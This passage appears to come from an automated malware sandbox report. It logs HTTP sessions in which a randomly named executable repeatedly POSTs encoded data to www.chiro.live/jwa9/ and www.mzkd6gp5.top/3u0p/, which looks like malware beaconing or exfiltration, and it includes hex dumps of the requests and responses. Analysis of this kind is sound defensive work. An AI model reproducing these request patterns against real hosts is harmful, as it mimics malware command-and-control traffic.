                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:33.953876972 CET1289INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:57:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/8.1.30
                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:33.953973055 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                    Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                    Jan 9, 2025 16:57:33.954088926 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                    Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                    Jan 9, 2025 16:57:33.954170942 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                    Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                    Jan 9, 2025 16:57:33.954265118 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                    Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                    Jan 9, 2025 16:57:33.954273939 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.11.304987945.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:39.122222900 CET793OUTPOST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 49 77 5a 33 4b 4c 4f 54 37 34 72 6e 7a 7a 6b 43 57 72 52 43 67 3d 3d
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoIwZ3KLOT74rnzzkCWrRCg==
                                                                                    Jan 9, 2025 16:57:39.268029928 CET806INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:39 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 da 30 10 bd e7 57 b8 3e 64 da 99 e2 2f 20 40 63 a7 93 50 3e eb 40 42 48 0c 5c 32 b2 a4 20 39 b2 e4 da b2 0d e9 f4 bf d7 c6 9d e0 0e 3d 54 07 4b bb de 7d bb ef ad 64 7f f8 36 ef 2f d7 77 03 85 c8 90 5d 9d d9 e5 a6 30 c0 b7 8e 8a b9 7a 75 a6 14 cb 26 18 a0 ea 78 30 43 2c 81 02 09 88 13 2c 1d f5 71 39 6c 74 ff 44 1e 7f 13 29 a3 06 fe 91 d2 cc 51 77 8d 14 34 a0 08 23 20 a9 cf b0 aa 40 c1 25 e6 45 ee 64 e0 60 b4 c5 27 d9 1c 84 d8 51 33 8a f3 48 c4 b2 96 90 53 24 89 83 70 46 21 6e 1c 8c cf 0a e5 54 52 c0 1a 09 04 0c 3b a6 66 d4 e1 24 95 0c 5f d9 7a b5 1f e8 1c 9a e4 22 81 31 8d e4 91 d6 bf 7b 8f f1 4b 8c 13 52 6b c1 b8 4c 63 e6 94 fc be e8 7a 9e e7 1d 43 83 84 c6 42 63 34 c3 ba aa e8 47 48 5b 3f 2d 63 1f d4 ab cb 73 5a a2 fd 7f 25 6c fd 38 18 db 17 68 af 08 ce 04 40 8e 8a c4 73 75 fc f8 a9 2e 46 45 59 91 fb a8 50 57 e2 9d d4 03 90 81 ca 5b 8b 2b 95 78 49 39 94 54 70 a5 06 a5 fc 7c d7 af 0c 29 57 4e 39 12 b9 26 45 a4 31 01 8b f9 0a ae 91 82 90 e2 28 [TRUNCATED]
                                                                                    Data Ascii: 266SMs0W>d/ @cP>@BH\2 9=TK}d6/w]0zu&x0C,,q9ltD)Qw4# @%Ed`'Q3HS$pF!nTR;f$_z"1{KRkLczCBc4GH[?-csZ%l8h@su.FEYPW[+xI9Tp|)WN9&E1(Q@Az_cIISh5VF\; &OM95Wz5p?'Of5e@E>5Qg">f#2V8,nI `x|Bx3F,iUedE[dn;br!ZCx$1C]{Cy8js/-i7t`4LLzVzt~[^^.u0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.11.304988045.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:41.808381081 CET813OUTPOST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 30 44 71 6c 53 7a 71 2f 32 32 6c 6b 67 7a 42 7a 78 53 6b 49 3d
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrY0DqlSzq/22lkgzBzxSkI=
                                                                                    Jan 9, 2025 16:57:41.953916073 CET805INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:41 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 36 c6 5f 0d a4 93 b8 f1 57 89 9d 38 4e 00 5f 32 42 52 2c 11 21 51 10 60 a7 d3 ff 5e 30 9d 98 8e 7b a8 0e 48 bb ec be dd f7 56 32 3f 7c 5b 8e d6 de dd 8d 42 64 c8 2e cf cc 72 53 18 e0 5b 4b c5 5c bd 3c 53 8a 65 12 0c 50 75 3c 98 21 96 40 81 04 c4 09 96 96 fa b8 1e 37 06 7f 22 8f bf 89 94 51 03 ff 48 69 66 a9 bb 46 0a 1a 50 84 11 90 d4 67 58 55 a0 e0 12 f3 22 77 76 63 61 b4 c5 27 d9 1c 84 d8 52 33 8a f3 48 c4 b2 96 90 53 24 89 85 70 46 21 6e 1c 8c cf 0a e5 54 52 c0 1a 09 04 0c 5b ed 66 ab 0e 27 a9 64 f8 d2 d4 aa fd 40 e7 d0 24 17 09 8c 69 24 8f b4 fe dd 7b 8c 5f 62 9c 90 5a 0b ad 8b 34 66 56 c9 ef 8b a6 e5 79 de 6f 35 21 a1 b1 68 32 9a 61 4d 55 b4 23 a4 a9 9d 96 31 0f ea d5 e5 39 2d d1 fd bf 12 a6 76 1c 8c e9 0b b4 57 04 67 02 20 4b 45 e2 b9 3a 7e fc 54 17 a3 a2 ac c8 7d 54 a8 2b f1 4e 6a 01 c8 40 e5 ad c5 95 4a bc a4 1c 4a 2a b8 52 83 52 7e be eb 57 86 94 2b a7 1c 89 bc 29 45 d4 64 02 16 f3 15 bc 49 0a 42 8a [TRUNCATED]
                                                                                    Data Ascii: 265SMs0WPv66_W8N_2BR,!Q`^0{HV2?|[Bd.rS[K\<SePu<!@7"QHifFPgXU"wvca'R3HS$pF!nTR[f'd@$i${_bZ4fVyo5!h2aMU#19-vWg KE:~T}T+Nj@JJ*RR~W+)EdIBG9~FV<HORdbx-^u.$36_^Q[:+sl4;0|7AZMW2A;\3;E(|Gd0pEq[@lg|>G;pMXQ;y?a"_72<i'vdtuxFlOvaHrwJ5s/7.d8}[_nZZyS^ou??0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.11.304988145.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:44.496201992 CET2578OUTPOST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 2b 6a 64 54 79 51 47 61 42 2f 73 4a 36 59 36 79 6a 74 35 62 64 59 64 6b 34 46 75 6b 4c 63 30 6f 50 6c 48 39 31 36 34 4d 75 59 7a 6e 66 64 45 6d 7a 54 75 30 49 32 75 75 58 4d 4d 58 4d 5a 70 51 36 4f 71 63 2b 53 41 4f 6b 67 2f 30 41 6a 63 46 49 69 44 6d 61 39 4f 4c 4e 65 76 6b 39 41 56 42 46 74 53 33 35 72 49 4d 4d 77 79 4d 53 31 52 58 77 48 79 46 5a 70 34 62 4b 49 4f 4e 4c 4b 6b 73 61 79 52 66 59 4b 6d 56 35 36 77 58 55 6e 62 51 4a 46 62 5a 68 71 44 34 78 44 4b 61 6b 56 73 52 67 2b 73 78 56 6b 52 47 5a 65 35 73 4e 4b 50 78 65 53 64 7a 4a 61 5a 70 7a 74 4a 6d 54 56 62 54 63 6b 4f [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd8+jdTyQGaB/sJ6Y6yjt5bdYdk4FukLc0oPlH9164MuYznfdEmzTu0I2uuXMMXMZpQ6Oqc+SAOkg/0AjcFIiDma9OLNevk9AVBFtS35rIMMwyMS1RXwHyFZp4bKIONLKksayRfYKmV56wXUnbQJFbZhqD4xDKakVsRg+sxVkRGZe5sNKPxeSdzJaZpztJmTVbTckO0FE+UhQWRCgU4xmxNCIKP2/vxE1WbYGBNZBD/ouBV0i+cfQDJxmq9GxCECvz/DPgpNMSVYSvE31ySSUkqutg4+DJVymMKKNg2iOpDG7U3yfP/G5mlnlsEMdOjCH49CfvfjHHPSAfQKA0AhKS4Fu6YJ24hX81o3lpL+8s5rV6bQ+dRR9N1BUWtNgsuyrdaHlh9bKXHX24C/ON82Hi2T2Ky1EBj2ONO7C30UVj/LFTCfStRZGw5Q1mSLZKKysaED43cgHPrRfN98sPVjF2dAv9Jotem52C6056pBNtUW6TFgjnm+5QmxtVOcR7OSRe2mjM1wW971Im5vG3OL//pl0Jxjuos3Mkg7qznrb9zF8JAL7BcR7mFXBYOI1SYWsKeIu5szpPxIhZ/sHdw+DmSa/ZTJ9sFqXPIELxqI2nUfad8Mt2swuBxm8N12R77hvXRdgN78AVrqqFN08gzz6YM3Qg63TdurPPd3+O4NKtYphxRDSaBcvefuzZsOijEz1Qsd//JqsTFj98fVa53rRUPHL1EEg7q7DTL31UZENO30mKP0gqq26jGHCTdNJqu8KKKsuA9Xmi717ceTxVCJcD0VVzaATABz+yLbrVy4XNJmjw/d5DhmEnvIEzVx9tYSe0PtFtj+hnAGpjf2KkdUBHC1LjXIWk5fTT9bOtxv [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:44.496234894 CET1352OUTData Raw: 41 35 47 30 66 67 50 53 73 70 63 31 44 36 64 52 6f 72 76 48 32 53 4d 78 6c 69 35 6a 6f 6c 79 65 74 66 5a 72 52 56 56 2f 6d 2f 64 6c 63 4a 33 54 61 6b 4b 4c 48 73 44 34 68 2f 75 4a 66 43 74 4d 4e 4c 4c 77 63 38 38 49 4b 5a 4d 6d 67 66 73 76 30 4c
                                                                                    Data Ascii: A5G0fgPSspc1D6dRorvH2SMxli5jolyetfZrRVV/m/dlcJ3TakKLHsD4h/uJfCtMNLLwc88IKZMmgfsv0L8dD2Emfr+ERRNBTCf2YxjcCc89VTHbTWL7aJB7YUROfOM3WZYpbT/1vA+Yzwwk+zNW2qGMVeg/yoVhvR1ZG5fjAglKX9ZfJ7La9HAARWKC1GkF2RQrBj6ekVea2PZQOtGp4VJhNItnXr05hPgNw99ho9fs9llBTvP
                                                                                    Jan 9, 2025 16:57:44.641789913 CET806INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:44 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 1b 9c d8 6e 20 9d c4 8d bf 4a ec c4 71 02 f8 92 11 92 62 89 08 89 82 00 3b 9d fe f7 82 e9 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 f5 e1 db 62 b8 f2 ef 6e 14 22 23 76 79 62 55 9b c2 00 df d8 2a e6 ea e5 89 52 2e 8b 60 80 ea e3 de 8c b0 04 0a 24 20 49 b1 b4 d5 c7 d5 a8 d5 ff 13 79 f8 4d a4 8c 5b f8 47 46 73 5b dd b6 32 d0 82 22 8a 81 a4 01 c3 aa 02 05 97 98 97 b9 d3 1b 1b a3 0d 3e ca e6 20 c2 b6 9a 53 5c c4 22 91 8d 84 82 22 49 6c 84 73 0a 71 6b 6f 7c 56 28 a7 92 02 d6 4a 21 60 d8 ee 68 ed 26 9c a4 92 e1 4b 4b af f7 3d 9d 7d 93 5c a4 30 a1 b1 3c d0 fa 77 ef 09 7e 49 70 4a 1a 2d b4 2f b2 84 d9 15 bf 2f ba 5e 14 45 af ad 41 42 13 a1 31 9a 63 5d 55 f4 03 a4 a5 1f 97 b1 f6 ea 35 e5 39 2e 71 f6 7f 25 2c fd 30 18 2b 10 68 a7 08 ce 04 40 b6 8a c4 73 7d fc f8 a9 29 46 4d 59 91 bb b8 54 57 e2 ad d4 43 90 83 da db 88 ab 94 78 c9 38 94 54 70 a5 01 a5 fc 7c d7 af 0a a9 56 41 39 12 85 26 45 ac 31 01 cb f9 0a ae 91 92 90 62 [TRUNCATED]
                                                                                    Data Ascii: 266SMs0WPvn Jqb;tCu@ebn"#vybU*R.`$ IyM[GFs[2"> S\""Ilsqko|V(J!`h&KK=}\0<w~IpJ-//^EAB1c]U59.q%,0+h@s})FMYTWCx8Tp|VA9&E1b+A@a_79ey5yWk~4{FTHglRf:+{3wpa,Dfmc=#x8<\{i(6SdxrR-s,[e7p`B[.{]cd/1:dm<xpwg{(wlq\([rGYCa9l^5_7W7|J%0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.11.304988245.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:47.176954031 CET533OUTGET /jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:57:47.321386099 CET1289INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:57:47 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    connection: close
                                                                                    Data Raw: 34 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED]
                                                                                    Data Ascii: 49D<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICI2Qi1sN0Y9bmJFYjZCYXBqckNZZDN2dUVrNjhkUkxZNHVhMk1vODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tUVDlSSGNsdHVDQUFBazUxSjQ9Jjgwaz1sUmFwQ1BNWGdEayIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7 [TRUNCATED]
                                                                                    Jan 9, 2025 16:57:47.321394920 CET60INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: ; } </script> </body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    58192.168.11.3049883104.21.32.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:52.471359015 CET799OUTPOST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
